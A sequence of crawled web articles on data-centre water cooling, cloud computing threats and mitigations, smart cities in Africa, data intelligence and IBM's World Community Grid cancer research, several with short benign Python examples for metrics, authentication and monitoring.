Bias is an unfortunate reality in today’s AI applications. But by evaluating the data samples and training algorithms and making sure that both are comprehensive and complete, we can mitigate unintended biases. We need to task diverse teams with governing the machines to prevent unwanted outcomes. With the right protocol and measures, we can ensure that AI delivers on its promise and yields the best business results.
Originally appeared in Information Management | <urn:uuid:044bca30-39c6-480e-bd33-dadcb0b5d6c8> | CC-MAIN-2022-40 | https://resources.experfy.com/ai-ml/the-bias-problem-with-artificial-intelligence-and-how-to-solve-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00694.warc.gz | en | 0.938363 | 1,212 | 3.765625 | 4 |
Water cooling technologies have seen evident improvements in recent years, and data centers rely on water to cool equipment and sustain operations. Removing heat from IT facilities is a priority, and water is a primary medium that facilitates the cooling exchange in a data facility.
Water management in a data center is a vital variable to ensure operational uptime. With multiple layers of equipment that are sensitive to heat, optimum cooling is necessary. Water quality that complies with standards is a factor that needs utmost consideration. Any organic matter or natural sediment in the water used for cooling will affect cooling efficiency and can, ultimately, lead to equipment damage and downtime.
Why Is Water A Vital Resource?
Traditionally, many water supplies come from municipal groundwater. However, this source is a common good shared with all the other stakeholders who depend on it. Extracting water can cause scarcity and affect community life. At the same time, water supply plays a significant role in sustaining a data center. The criticality of obtaining water, and the need to use it efficiently, highlight how vital the resource is.
The evolution of data centers has steadily increased in recent years. New hyper-scale data centers are sprouting at a faster rate. The increased number requires further cooling requirements. With more extensive cooling needs, the water supply needs enormous volume. Ultimately, this adds stress to the already depleting local water resources.
The Challenge For Data Centers
Because of constant expansion, new data centers are met with cooling inadequacy. The facilities are left to make do with the current water supply. The combined demand of many data centers cannot be addressed by lone local resources alone.
For many data centers, future water-cooling integration starts with the water source itself. The current challenge is to provide data centers with a dedicated water utility supply, veering away from extracting water that is meant mainly for public use.
Building new water plants can address this challenge. A wastewater treatment plant is also a sustainable solution to make certain water use is maximized. Other data centers with existing facilities can expand to cater to more considerable supply volume. But building water plants from the ground up would take a longer time. A more extended construction period will hamper the operational run of any existing data center.
Overcoming this issue will need an external solution. These can be external capacities that can be outsourced for the time being. These water supplies can bridge the lack of water while the construction is ongoing. Cooling systems can still run from these supply solutions. Some of these are:
- Mobile Water Treatment Trailers
- Containerized Systems
- Fixed Capital Equipment
A mobile water treatment trailer, for example, can cover the water supply for a defined period, keeping the facility running while the permanent water plant is built. However, despite the adaptability of these makeup water supplies, long-term water planning should always take precedence. Accurately mapping water needs in the initial planning stages will help avoid losing water supply along the way.
Planning For Long-Term Water Technologies
Datacenter development needs long-term water cooling technology. Different water cooling technologies are designed for a particular purpose. The most exact need, however, is necessary as a cooling solution. Because of its crucial role, water cooling technologies should stand the test of time and environmental weathering. Planning to build or upgrade water plants should go through a thorough process to ensure long-running conditions. The planning stages should also consider the facility’s flexibility to adapt to the increasing data center cooling demands.
Initial Water Quality Evaluation
At the outset of any water plant project, water quality should be a prerequisite. Sources of water need proper evaluation and characterization. More often, analysis is only done for water sources that are accessible. Analyzing groundwater requires a comprehensive check for alternate water sources within the site.
The additional water source can serve as an alternate source. It can also contrast water quality from other sources. Selecting the best one would be easier with many options to look into. Water composition is integral in water quality evaluation. The different water sources will elicit different chemical and mineral makeup. A specific focus on these water attributes will negate extra costs in the long run.
All Options Accounted
A water source’s natural composition alone does not make it the best choice. For many water plants, different project requirements come into play.
- Reduced Capital Costs
- Efficient Operation Costs
These variables are considered because water quality is not all about potability. The bigger problem comes when the water has a natural makeup high in hardness or mineral content, which will reduce cooling efficiency. The occurrence of these elements will prove detrimental to the water treatment process as a whole.
Advice Of Specialized Experts
The value of water resources plays a big part in a data center’s efficiency. It can affect power usage effectiveness (PUE) and water usage effectiveness (WUE). Running water operations properly requires technical know-how.
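For reference, both metrics are simple ratios, sketched below in Python following The Green Grid definitions (the example figures are hypothetical):

```python
def pue(total_facility_energy_kwh, it_energy_kwh):
    """Power Usage Effectiveness: total facility energy over IT energy
    (ideal is 1.0; lower is better)."""
    return total_facility_energy_kwh / it_energy_kwh

def wue(site_water_liters, it_energy_kwh):
    """Water Usage Effectiveness: liters of water consumed per kWh of
    IT energy (lower is better)."""
    return site_water_liters / it_energy_kwh

# A facility drawing 1.5 GWh in total for 1.0 GWh of IT load,
# while consuming 1.8 million liters of water:
assert pue(1_500_000, 1_000_000) == 1.5
assert wue(1_800_000, 1_000_000) == 1.8
```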
Specialized experts have valuable experience to uphold data center efficiency. Some data centers will decide to outsource experts on the water landscape. These experts are consultants to determine and address water concerns. These pieces of advice are significant inputs that will preserve water quality.
Optimizing Operational Capacity
Water use is a continuous activity in a cooling process. Because it requires significant volumes, reusing water is more logical and ensures that water source depletion will not arise. Reusing water requires specialized technologies. A wastewater treatment facility has technological solutions that can effectively restore water quality. Other strategies include limiting biological growth in the water, which requires thorough chemical analysis beyond basic water sampling. These methods extend the useful life of water.
Shift To An Evaporative Cooling System
Weighing the trade-off between water utilization and energy usage, most data centers now aim to reduce energy consumption. They look into reducing power utilization, where evaporative cooling systems that use water are effective. The downside, however, is an increased water supply requirement.
Lesser Dependency On Local Resource
With competing issues concerning water use with the rest of the community, water reuse technologies negate such disputes. Replacing potable water with treated wastewater reduces the dependency of local data centers on municipal water sources. Hence, the community will have a more significant stake in the resource. On the other hand, the data centers will have lesser water needs and can only avail of the local resource when necessary.
Better Water Facility Monitoring
Water cooling technology is responsible for efficient cooling yields in a data center. As such, water plants are vital facility integration. With an upgrade in the water supply facility, monitoring solutions should also keep pace to ensure optimized sustainability of the whole data center.
Monitoring Water Treatment Facility
A water treatment facility must run 24/7, every day of the year. It is often more extensive and far-reaching than a pumping station, so adequate remote monitoring is essential. AKCPro Server, used as a control panel connected to the site, can check engine parameters remotely. These parameters include:
- Oil Pressure
- Battery Voltage
- Engine Temperature
- Fuel Level
- Engine Speed
This server provides custom dashboards to display data on generators and sensors installed throughout the water cooling technologies.
AKCP sensors can monitor backup power systems, enabling a steady flow of supply to the facility.
- AKCP Wireless Water Distribution Control
- Wireless Tank Level Sensor
Monitor tanks at depths of up to 20 meters. Tanks are often located outdoors or in difficult-to-cable areas. The WT-TDPS is battery powered or can be powered from a 5V DC or 12V DC source. Track fuel usage, graph the tank level, and receive alerts when tank levels are critical. There are no more constraints on maximum cable lengths from the base unit.
These smart monitoring technologies help maintain the proper operation runtime of the pumping station.
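As a toy illustration of the alerting just described, the sketch below classifies a tank-level reading. The thresholds, messages and function name are assumptions for illustration only, not AKCP's actual firmware logic:

```python
# Hypothetical thresholds, chosen for illustration.
TANK_DEPTH_M = 20.0       # maximum monitored depth of the tank
CRITICAL_LOW_M = 2.0      # assumed level at which an alert should fire

def check_tank(level_m: float) -> str:
    """Classify a single tank-level reading from a wireless sensor."""
    if level_m < 0 or level_m > TANK_DEPTH_M:
        return "sensor fault"          # reading outside the physical range
    if level_m <= CRITICAL_LOW_M:
        return "ALERT: tank level critical"
    return "ok"

print(check_tank(1.5))  # a low reading triggers the alert branch
```

In a real deployment the reading would arrive from the monitoring platform and the alert would be routed to the dashboard rather than printed.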
Vitality Of Water Cooling Technologies In The Future
The water footprint will be embedded in the evolution of data centers. Developments in IoT and artificial intelligence will prime edge computing resources. With this progress, cooling systems need a boost to address heat-removal demands. As a significant rise is seen in data centers, valuable progress can also be expected in water cooling technologies.
Cloud Computing Threats: Beyond Vulnerabilities
Cloud Computing: Definition, Models, Vulnerabilities and More. Everything you need to know to enhance and protect your business!
When you hear the term cloud computing, know that it has little to do with the famous cloud nine some sing about – it is a key concept in the current and future evolution of technology. Like everything else, though, it has its strengths and downsides, so let us take a closer look at some of the most relevant cloud computing threats and vulnerabilities – but not without first defining the notion. According to Edwards Zamora,
Cloud computing consists of the set of systems and services working in unison to provide distributed, flexible, and measurable resources to consumers of cloud services. The National Institute of Standards and Technology (NIST) defines cloud computing as a model that consists of on-demand self-service, broad network access, resource pooling, rapid elasticity and measured service (Mell & Grance, 2011). Essentially, cloud computing allows consumers to provision for themselves resources available from a cloud services provider. Consumers are able to access their cloud resources from a wide variety of devices including mobile, thin clients, and traditional desktops. […] Physical and virtual systems are combined to provide consumers with resources dynamically without the user needing to know the details of how it all works.
As i-SCOOP notes:
Cloud computing is also one of the essential enablers of Industry 4.0, has been shaping the software and business applications market for over a decade, has an important place in the development of the Internet of Things and is essential to manage data, including big data, to give just a few examples.
Cloud technology is also used for hosting popular services like e-mail, social media and business applications. The average person checks their phone 221 times per day to look at e-mails, browse the Internet or use smartphone applications. Besides, 82% of large enterprises are now using cloud computing, and up to 78% of small businesses are expected to adopt cloud technology in the next few years.
Depending on the delivery methods, the 4 main cloud delivery models are the following:
- Public Cloud – owned and operated by a third-party provider, can be used by everyone, so it’s publicly accessible. Examples: Microsoft Azure, Google.
- Private Cloud – a distinct cloud, whose main key trait is privacy, which can be used in several ways by a specific organization.
- Hybrid Cloud – a computing environment which combines a public cloud and a private one (or more) by allowing the exchange of data and applications between them.
- Community Cloud – a cloud used by a community of people with, possibly, shared or common profiles, for a common shared purpose.
Depending on the types of services and resources a customer subscribes to, here are the 3 main cloud services available:
- Software as a Service (SaaS). The choice of most businesses, SaaS utilizes the Internet to deliver applications that are managed by a third-party vendor to the users. Many SaaS applications run directly through the web browser, meaning they do not need to be downloaded or installed. SaaS is the best option for:
  - short-term projects that require quick, easy and affordable collaboration.
  - startups or small companies that need to launch e-commerce quickly.
  - applications that need both web and mobile access.
  - applications that aren’t needed very often.
- Platform as a Service (PaaS). Cloud platform services deliver a platform that can be modified by developers to create customized applications. PaaS is particularly useful when:
  - multiple developers are working on the same development project.
  - other vendors must be included, PaaS providing great speed and flexibility to the whole process.
  - you need to create customized applications.
  - you are rapidly developing and deploying an application, because it can reduce costs and simplify challenges.
- Infrastructure as a Service (IaaS). Cloud infrastructure services are made of highly scalable and automated compute resources. IaaS is self-service for accessing and monitoring computers, networking, storage and so on, allowing businesses to purchase resources on-demand. IaaS is most advantageous:
  - for small companies or startups, to avoid spending time and money on purchasing and creating hardware and software.
  - for larger companies that want to purchase only what they actually consume or need.
  - for companies experiencing rapid growth that want to easily swap out specific hardware and software.
Among the benefits of cloud computing we mention:
A. Mobile access to company data
Cloud computing allows mobile access to your company’s data via various types of devices – smartphones, tablets, laptops – which is particularly useful in the context of the Coronavirus and work-from-home policies.
B. Easy to scale server resources
Most cloud servers provide access to an intuitive site management dashboard where you can view your site’s performance in real-time. Server resources can be scaled up or down on the spot, without having to wait for your hosting provider’s approval.
C. Safety from server hardware issues and loss prevention
By choosing a cloud service you make sure you avoid any physical server issue like hacking, hardware failure or system overload. We could also include here natural disasters or fires that could destroy your equipment. Most cloud-based services provide data recovery for all kinds of emergency scenarios, from natural disasters to power outages.
D. Faster website speed and performance
Usually, a cloud server means blazing speed, which will allow you to increase your site’s capacity and give you a great competitive edge.
E. Automatic software updates
Anyone busy knows how irritating it is to wait for system updates to be installed. Instead of forcing an IT department to perform a manual, organisation-wide update, cloud-based applications automatically refresh and update themselves.
If you aim to have a positive impact from an environmental point of view too, bear in mind that by choosing cloud computing you help cut down on paper waste, improve energy efficiency and reduce commuter-related emissions. As I already mentioned, cloud computing can bring amazing benefits to companies, but it also has its downsides. If we want to discuss cloud computing threats and vulnerabilities, though, we must not forget the context of the times we live in. According to Gartner,
The shortage of technical security staff, the rapid migration to cloud computing, regulatory compliance requirements and the unrelenting evolution of threats continue to be the most significant ongoing major security challenges. However, responding to COVID-19 remains the biggest challenge for most security organizations in 2020. “The pandemic, and its resulting changes to the business world, accelerated digitalization of business processes, endpoint mobility and the expansion of cloud computing in most organizations, revealing legacy thinking and technologies,” says Peter Firstbrook, VP Analyst, Gartner.
Here are the main cloud computing threats and vulnerabilities your company needs to be aware of:
1. Lack of Strategy and Architecture for Cloud Security
In their haste to migrate to the cloud, many companies become operational long before the security strategies and systems are in place to protect their infrastructure.
2. Misconfiguration of Cloud Services
Misconfiguration of cloud services is a growing cloud computing threat you must pay attention to. It is usually caused by keeping the default security and access management settings. If this happens, important data can be publicly exposed, manipulated or deleted.
3. Visibility Loss
Cloud services can be accessed through multiple devices, departments and geographic places. This kind of complexity might cause you to lose sight of who is using your cloud services and what they are accessing, uploading or downloading.
4. Compliance Violation
In most cases, compliance regulations require your company to know where your data is, who has access to it, how it is processed and protected. Even your cloud provider can be asked to hold certain compliance credentials. Thus, a careless transfer of your data to the cloud or moving to the wrong provider can bring potentially serious legal and financial repercussions.
5. Contractual Breaches
Any contractual partnerships you have or will develop will include some restrictions on how any shared data is used, how it is stored and who has authorized access to it. Unknowingly moving restricted data into a cloud service whose providers include the right to share any data uploaded into their infrastructure could create a breach of contract, which could lead to legal actions.
6. Insecure Application User Interface (API)
Operating systems in a cloud infrastructure are sometimes controlled through an API that helps to implement control. APIs are sets of programming code that enable data transmission between one software product and another and contain the terms of this data exchange. An Application Programming Interface (API) has two components: a technical specification describing the data exchange options, in the form of a request for processing and data delivery protocols, and the software interface written to that specification.
Any API can be accessed internally by your staff and externally by consumers – and it is the external-facing API that can represent a cloud computing threat. Any insecure external API might become a gateway through which cybercriminals gain unauthorized access, steal data and manipulate services.
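One common mitigation for an insecure external API is to require each request to carry an HMAC signature over the body, which the server verifies in constant time. The sketch below illustrates the idea; the secret and payloads are placeholders, and a real deployment would load the secret from a vault rather than source code:

```python
import hashlib
import hmac

# Placeholder secret for illustration only – never hard-code real secrets.
SECRET = b"demo-shared-secret"

def sign(payload: bytes) -> str:
    """Compute the HMAC-SHA256 signature a trusted caller would attach."""
    return hmac.new(SECRET, payload, hashlib.sha256).hexdigest()

def verify(payload: bytes, signature: str) -> bool:
    """Recompute the signature server-side and compare in constant time."""
    # compare_digest avoids leaking information through timing differences.
    return hmac.compare_digest(sign(payload), signature)
```

A request whose body was tampered with in transit no longer matches its signature, so the server can reject it before any processing happens.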
7. Insider Threats
Your employees, contractors and business partners can, without having any malicious intent, become some of your biggest security risks due to a lack of training and negligence, as we have already shown. Moving to the cloud introduces a new layer of insider threat: the cloud service provider’s own employees. Although there are so many threats and vulnerabilities, it is clear that cloud computing can be really helpful to any company if used correctly, and that it is here to stay – so let us now mention some of the safety measures you can take.
Here’s what you can do to efficiently combat cloud computing threats and vulnerabilities:
1. Manage User Access
Not every employee needs access to every application, file or bit of information. By setting proper levels of authorization you make sure that everyone gets to view or manipulate only the data and the applications necessary for them to do their job.
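A minimal role-based sketch of this idea; the roles and actions below are hypothetical examples, not a recommendation for any particular product:

```python
# Hypothetical mapping of roles to the only actions they are allowed.
ROLE_PERMISSIONS = {
    "analyst": {"view_reports"},
    "developer": {"view_reports", "deploy_code"},
    "admin": {"view_reports", "deploy_code", "manage_users"},
}

def is_authorized(role: str, action: str) -> bool:
    """Deny by default: an action is allowed only if the role grants it."""
    return action in ROLE_PERMISSIONS.get(role, set())
```

The key design choice is deny-by-default: an unknown role or an unlisted action is refused, so new capabilities must be granted explicitly rather than removed after the fact.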
2. Deploy Multi-Factor Authentication
Stolen credentials are one of the most common methods hackers use to get access to your company’s online data. Protect it by deploying multi-factor authentication and make sure that only authorized personnel can log in and access data.
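The one-time codes behind most authenticator apps follow RFC 6238 (TOTP), which builds on RFC 4226 (HOTP). Below is a minimal standard-library sketch for illustration rather than production use; real systems should rely on a vetted library and store secrets securely:

```python
import base64
import hashlib
import hmac
import struct
import time

def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation offset
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret_b32: str, interval: int = 30) -> str:
    """RFC 6238 time-based variant: the counter is the current 30s window."""
    key = base64.b32decode(secret_b32)
    return hotp(key, int(time.time()) // interval)
```

Because the code is derived from a shared secret plus the current time window, a stolen password alone is not enough to log in.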
3. Detect Intruders with Automated Solutions that Monitor and Analyze User Activity
Abnormal activities can indicate a breach in your system, so try using automated solutions that can help you spot irregularities by monitoring and analyzing user activities in real-time. This is a very efficient tool in the combat against cloud computing threats and vulnerabilities.
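A simple statistical version of such monitoring flags a user whose latest activity count sits far outside their recent baseline. The figures and the z-score threshold below are illustrative assumptions; commercial tools use far richer models:

```python
from statistics import mean, stdev

def is_anomalous(history: list[float], latest: float,
                 z_threshold: float = 3.0) -> bool:
    """Flag a reading more than z_threshold standard deviations from baseline."""
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        # A perfectly flat baseline: any deviation at all is suspicious.
        return latest != mu
    return abs(latest - mu) / sigma > z_threshold

# Example: a user who normally downloads ~11 files suddenly downloads 60.
print(is_anomalous([10, 12, 11, 13, 12, 11, 12, 10], 60))
```

In practice the alert would feed a dashboard or ticketing system so a human can decide whether the spike is a breach or a legitimate burst of work.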
4. Consider Cloud to Cloud Back-Up Solutions
The chances of losing data because of your cloud provider’s mistake are pretty low – unlike losing it due to human error. Check with your cloud provider how long they store deleted data and whether there are any fees to restore it, or turn to a cloud-to-cloud back-up solution.
5. Provide Anti-Phishing Training for Employees
The Heimdal™ Security team is very fond of education – we really believe that knowledge is power and that many threats can be confronted if we know about them and try our best to prevent them. It goes without saying that we recommend you discuss the dangers of phishing with all your employees. (We actually wrote more about this here, here and here.)
6. Develop an Off-Boarding Process to Protect against Departing Employees
Always make sure that the employees that leave your company can no longer access your systems, data or customer information by revoking all the access rights. You can manage this internally or outsource the task to someone who knows how to implement the process.
Heimdal™ Security can also help. Here’s how!
In our opinion, you can choose between 3 approaches – or opt for all of them if you want top cybersecurity for your company:
Manage user access with Heimdal™ Privileged Access Management, our Privileged Access Management (PAM) software, which helps your organization achieve not just better cybersecurity, but also full compliance and higher productivity. Heimdal™ Privileged Access Management will allow your system admins to approve or deny user requests from anywhere or set up an automated flow from the centralized dashboard. Moreover, all the activities will be logged for a full audit trail.
Heimdal® Privileged Access
Heimdal® Email Security | <urn:uuid:6493cb19-7ff0-493c-b189-1f8f1ef4f366> | CC-MAIN-2022-40 | https://heimdalsecurity.com/blog/cloud-computing-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00694.warc.gz | en | 0.933953 | 2,548 | 2.828125 | 3 |
Public administration officials and technology leaders have been advocating for the concept of smart cities — which use technology such as IoT, AI and 5G for cost-efficient service delivery — as an answer to issues raised by Africa’s burgeoning population and increasing urbanization.
Projects to build smart cities from the ground up take years to complete, however, and some experts have been advocating for a more modular approach, calling for the incorporation of emerging technology into existing urban infrastructure.
What are smart cities?
Smart cities integrate components such as sensors with IoT networks and information and operational technology to monitor and control infrastructure, devices and the flow of data, with the overall goal of improving the standard of living for residents. Superfast 5G is used to connect components wirelessly, and AI applications are often used to monitor and control networks, and do predictive maintenance.
Big greenfield projects such as Konza Technopolis, in Kenya, and Lanseria Smart City, in South Africa, are moving ahead. As emerging technology is being deployed throughout Africa and becoming more readily available, though, there is a growing debate about whether more focus should be placed on modernising existing communities.
Greenfield smart city projects require massive investments. Konza Technopolis, for example, is estimated to have nearly US$1 billion in building costs for the government, and carry a total price tag of $14.5 billion including investments from third parties. The project, a 5,000-acre development 64 km south of Nairobi adjacent to Konza City, is still on course, and includes the Tier III Konza National Data Center.
The main aim of Konza Technopolis is to generate local innovation and attract international, innovative companies to develop solutions for Kenya. Konza has already forged agreements with foreign technology companies and research institutions to establish themselves at the technopolis.
Smart cities offer data-driven services
Upon its completion, Konza Technopolis will offer data-driven services. For example, roadway sensors will be able to monitor pedestrian and automobile traffic and adjust traffic-light timing accordingly to optimize traffic flows and issue emergency warnings. Energy and water consumption will be closely monitored.
The idea behind constructing Konza Technopolis as a greenfield project from the ground up was to assure an advanced development from the onset, according to Eng. John Tanui, CEO of Konza Technopolis Development Authority, the semi-autonomous government agency in charge of overseeing the smart city’s development.
“Even in advanced economies, in terms of creating a new economic drive, at times you have to go to a greenfield approach,” he said, giving the example of Research Triangle Park in North Carolina, U.S., which was established as a research community.
A range of urban planners and technology leaders, however, are suggesting different approaches for Africa.
Emerging tech benefits existing communities
World Mobile, a mobile communications network provider, aims to bring the smart city concept to existing communities, using emerging technology such as solar power and a blockchain-based payment and funding system to bring connectivity to underserved regions.
World Mobile’s applications and services are targeted at the nearly 4 billion people globally who are still unconnected to communications networks.
The company has created what it calls “smart villages” that have helped businesses grow while enhancing the lives of people.
Its project in Tanzania has connected universities, schools, and remote villages, providing them with connectivity and power, said Micky Watkins, CEO of World Mobile. Its business model builds on existing infrastructure and does not aim to interrupt the lifestyle of local residents.
“Africa has the opportunity to leapfrog the rest of the world into the 4th industrial revolution,” Watkins said, referring to the concept of a convergence of emerging technologies expected to supercharge economic growth. “Africa cannot and should not wait for 5G to build smart cities. There are already enough unlicensed spectrums for IoT to make communications more affordable and efficient.”
Hugues Parant, the CEO of the Euroméditerranée urban development agency, offers a similar view on how Africa can build smart cities, based on his own experience. The agency is working to make Aix-Marseille-Provence — a group of cities and towns in France — a smart, connected and sustainable community. It is one of the biggest urban development projects in Europe.
“To answer the gigantic urban development needs, many African countries have decided to literally build brand new cities, sometimes 50 kilometres from capitals,” Parant said. However, this has only magnified the issues that the old infrastructures face, he said.
“A city will be smart if it can adapt to all types of populations instead of excluding some,” Parant said.
Major vendors tend to agree.
“Don’t try to build everything from scratch. Bring in the technology platforms that allow you to build what matters most for specific urban populations,” said Sanjay Brahmawar, CEO of Software AG.
The company has recently participated in projects in Riyadh and Dubai to do exactly that: establish a foundation, using its Cumulocity IoT integration platform, upon which smart city services can be built.
Brahmawar said that empowering these existing cities with technology — in particular IoT and analytics — can help to manage services including water, power and healthcare, making them more accessible and more affordable.
“This is how a project can remain focused on citizen, business and investor services — the priorities — and not get slowed down by technology development,” Brahmawar added.
Parant contends that Africa has all it takes to create smart cities within the existing infrastructure. His advice to innovation leaders is to have cities inspired by their history, traditions and local cultures. They should be designed by their residents and use technologies adapted to them.
Rwanda’s smart city master plan follows this ideology. The government sets policies and guidelines that towns and city leaders can adopt to make their existing developments ‘smart’.
A hybrid approach for African smart cities is likely
Ultimately, a mix of approaches to the smart city concept is likely to prevail.
Even though Konza Technopolis CEO Tanui oversees a massive greenfield project, he also agreed that revitalizing existing cities is another way to bring smart city services to Africa. As part of his early work as deputy country CEO and vice president of Huawei Technologies, he worked in several cities in Africa to bring applications such as smart video cameras to municipalities.
However, most African countries need to create new urban settlements and coupling them with smart solutions kills two birds with one stone, he said.
“If you check the global urbanization rate, Africa is the one [region] urbanizing at the highest rate. There is no shortcut: We must create new urban developments to accommodate the new urban population,” he said. | <urn:uuid:e1aab510-e1ac-4aba-8eb9-52eba22fdbf4> | CC-MAIN-2022-40 | https://www.cio.com/article/188906/why-tech-leaders-are-rethinking-the-smart-city-concept-for-africa.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00094.warc.gz | en | 0.948264 | 1,419 | 3.3125 | 3 |
With the advent of available technologies such as big data, artificial intelligence (AI) and machine learning are undergoing an unforeseen evolution. Smart machines no longer operate on synthetic data alone, but use in-field ‘true’ data, which not only enhances their capability for better human interaction but also signals many more future possibilities. Data intelligence is one such development that can contribute significantly to these tools.
Data intelligence is the combination of AI and machine learning (ML), and it carries the promise of a prolific tomorrow. With cloud-based storage offering massive sizes and speeds, data intelligence signals a coming of optimal fusion. Technology is becoming better every day, especially with regard to efficiency, and amid this stream, data intelligence does not look like a disappointing pick.
The Base Foundation For Data Intelligence
With optimized data awareness, data intelligence offers a rather unconventional 360-degree view of the business environment, one that encompasses both customer- and organization-centered data analysis. With proper knowledge of both ends, business will flourish.
Data intelligence has several components that involve a set of techniques each:
Descriptive: For reviewing and examining the data to understand and analyze business performance.
Prescriptive: For developing and analyzing alternative knowledge that can be applied in future courses of action.
Diagnostic: For determining the possible causes of particular occurrences.
Predictive: For analyzing historical data to determine future occurrences.
Decisive: For measuring the data adequacy and recommending future actions to be undertaken in an environment of multiple possibilities.
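To make the descriptive and predictive components concrete, here is a minimal sketch using hypothetical monthly sales figures; the data and the naive trend forecast are illustrative only:

```python
from statistics import mean

# Hypothetical monthly sales figures, for illustration.
monthly_sales = [120, 132, 128, 141, 150, 158]

# Descriptive: summarize past business performance.
average = mean(monthly_sales)

# Predictive: naive forecast from the average month-over-month change.
deltas = [b - a for a, b in zip(monthly_sales, monthly_sales[1:])]
forecast_next = monthly_sales[-1] + mean(deltas)

print(f"average: {average:.1f}, next-month forecast: {forecast_next:.1f}")
```

Real predictive analytics would use proper time-series models, but even this toy example shows the pipeline: describe what happened, then project it forward.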
Data intelligence is moving towards becoming one of the primary facets of big data. From a brief infancy, data intelligence has reached a level that promises smart handling of massive data. It is not going to contract its wings either; the immediate favorable results have attracted the eyes of many firms, and various entrepreneurs have shown interest in making use of data intelligence and developing it further.
Having stated the potential of Data Intelligence, let us elaborate upon the various benefits of data intelligence and why a firm should embrace them:
Business nowadays is continuously on the verge of change. Any organization must accept and propagate newly emerging trends; failing to do so may result in a loss of popularity. Take, for example, smartphones with selfie cameras in India: mobile companies that do not embrace the trend are heading for an utter loss. With the help of data intelligence, organizations become immune to ignoring change. The smart adaptive dynamics inform firms about recurrent changes and what pattern of occurrence they follow. Based on this analysis, the organization can make informed decisions.
Stronger Foundations of Data
Data intelligence (DI) works towards strengthening existing big data by restructuring the mechanism of data arrangement. AI needs to dwell on data extensively, and it therefore becomes vital to enhance the data AI is going to use. With reliable data foundations, DI transforms big data into insights and then renders an optimized engagement capability involving the active agents; these include BI strategists, intelligent BI analysts, data intelligence warehouse architects, data scientists, and implementation and development experts, who all contribute towards making a stronger base for the data.
Data intelligence also takes charge of metamorphosing raw chunks of data into cumulative knowledge – it is akin to “concept formation” for computer systems. Machines that intake data usually do so without shunning the bad and choosing the good. With data intelligence, information is cleansed and transformed into smart capsules of ready-made information that are used within the business to measure performance, besides incorporating contextual data sources to enrich information management. With data intelligence, organizations need not worry about defining particular cases to the machines: data intelligence collectively feeds the deduced “knowledge” into the operation area where final processing is carried out.
Developing Augmented Analytics
Data intelligence incorporates advanced analytic techniques to deliver visualized predictive and prescriptive analytics. One scenario might be to augment an existing application instead of building a full application beforehand; based on the outcomes, further improvements can be proposed if necessary. With such preparation for an actual scenario, there remains little scope for failure in business strategies. The advanced simulations enable firms to foresee the possible outcomes and reform the prescriptions wherever necessary.
In conclusion, data intelligence is emerging as a modern tool that will become a prerequisite for any successful business. With enhanced features such as adaptive dynamics, data transformation and augmented analysis, data intelligence lays a foundation for the smooth and beneficial functioning of companies. If carried out aptly, it can yield extraordinary returns on investment through increased gains and simplified business strategies.
Thanks to 1.5 million volunteers who left their computers running when not in use and a little help from Big Blue, cancer researchers have announced significant progress in looking for new potential drugs in cancer treatment.
The Help Conquer Cancer Project worked with the IBM-supported World Community Grid to send out protein samples for simulation testing on all of the computers. The program, running in the background of the volunteers’ computers and harnessing unused compute cycles, simulated a process called crystallization, where proteins crystallize into a solid form.
In this form, the proteins can be further examined by special X-ray to see how they interact with cancer, and whether or not those proteins may cause the disease.
Using the World Community Grid to send out sample after sample to the volunteers, the Help Conquer Cancer Project believes it was able to determine six times as many images per protein for further testing in significantly less time than would be possible under manual human review.
By way of example, if a person looked at one image per second without rest — which is not humanly possible — it would take 1,333 days to examine all 12,500 proteins in the study. The World Community Grid did that in a fraction of the time, said Dr. Joseph Jasinski, an IBM distinguished engineer and program director of IBM’s Health Care and Life Sciences Institute.
“The World Community Grid is really good at running embarrassingly parallel computation, where you do the same task over and over again. So it’s set up for doing many possibilities to try where you want to throw away the ones that are no good quickly,” Jasinski told InternetNews.com.
Something like testing for cancer drugs works with a setup like the World Community Grid. The 1.5 million machines work independently and don’t communicate with each other, hence Jasinski’s description of them as “embarrassingly parallel.” They perform the same repetitive task over and over – in this case, testing a protein to see its potential in cancer treatment.
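In code, an embarrassingly parallel workload is simply an independent function mapped over many inputs. The sketch below uses a thread pool and a placeholder scoring function; the real project's simulation is of course far heavier, and CPU-bound work would typically use a process pool (or, as here, many separate machines):

```python
from concurrent.futures import ThreadPoolExecutor

def score_protein(sample_id: int) -> float:
    """Stand-in for one expensive, fully independent simulation."""
    return (sample_id * 2654435761 % 1000) / 1000.0

# Each task needs no result from any other, so they can simply be farmed out.
with ThreadPoolExecutor(max_workers=8) as pool:
    scores = list(pool.map(score_protein, range(12500)))

# Keep only the promising candidates; discard the rest quickly.
promising = [i for i, s in enumerate(scores) if s > 0.99]
```

Because workers never exchange intermediate results, the same pattern scales from one laptop to 1.5 million volunteer machines with no change in structure.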
An increasing number of firms are turning to this solution for their own large-scale computing tasks, but they are keeping the process inside the firewall. Distributed computing lends itself well to a “loosely coupled” task like searching through a vast amount of data for a match, Jasinski said.
In a “tightly coupled” scenario, where the program might need the results of one step in order to continue, or processors need to communicate, a company would be better off using IBM’s BlueGene servers, where high-speed interconnects enable interprocessor communication, Jasinski said.
IBM consulting helps firms determine whether their computation needs are loosely coupled or tightly coupled, and offers the appropriate solution. Some companies are using loosely coupled computing internally, Jasinski said.
IBM has its own technology and services through its Smarter Planet initiative to help these firms build internal distributed computing systems. Companies like financial, life science and drug research firms put an agent on employee computers and request they leave their computer running at the end of the day, he said.
“We have helped companies and institutions set these things up. It’s part of a growing trend around distributed computing, a sort of precursor to cloud computing in a sense, so I think that general trend of trying to harness the horsepower you have and get as much productivity from the infrastructure you have is going to continue,” Jasinski said.
“We have a good and growing list of problems people are applying this technology toward, typically in energy, the environment, health care and life sciences. We’ve also tried to get some stuff going in computational aspects of humanities research,” he added.
The World Community Grid launched in 2004 and is the world’s largest public scientific research computer network, with 514,000 members offering 1.5 million devices, meaning many members contribute more than just one personal computer.
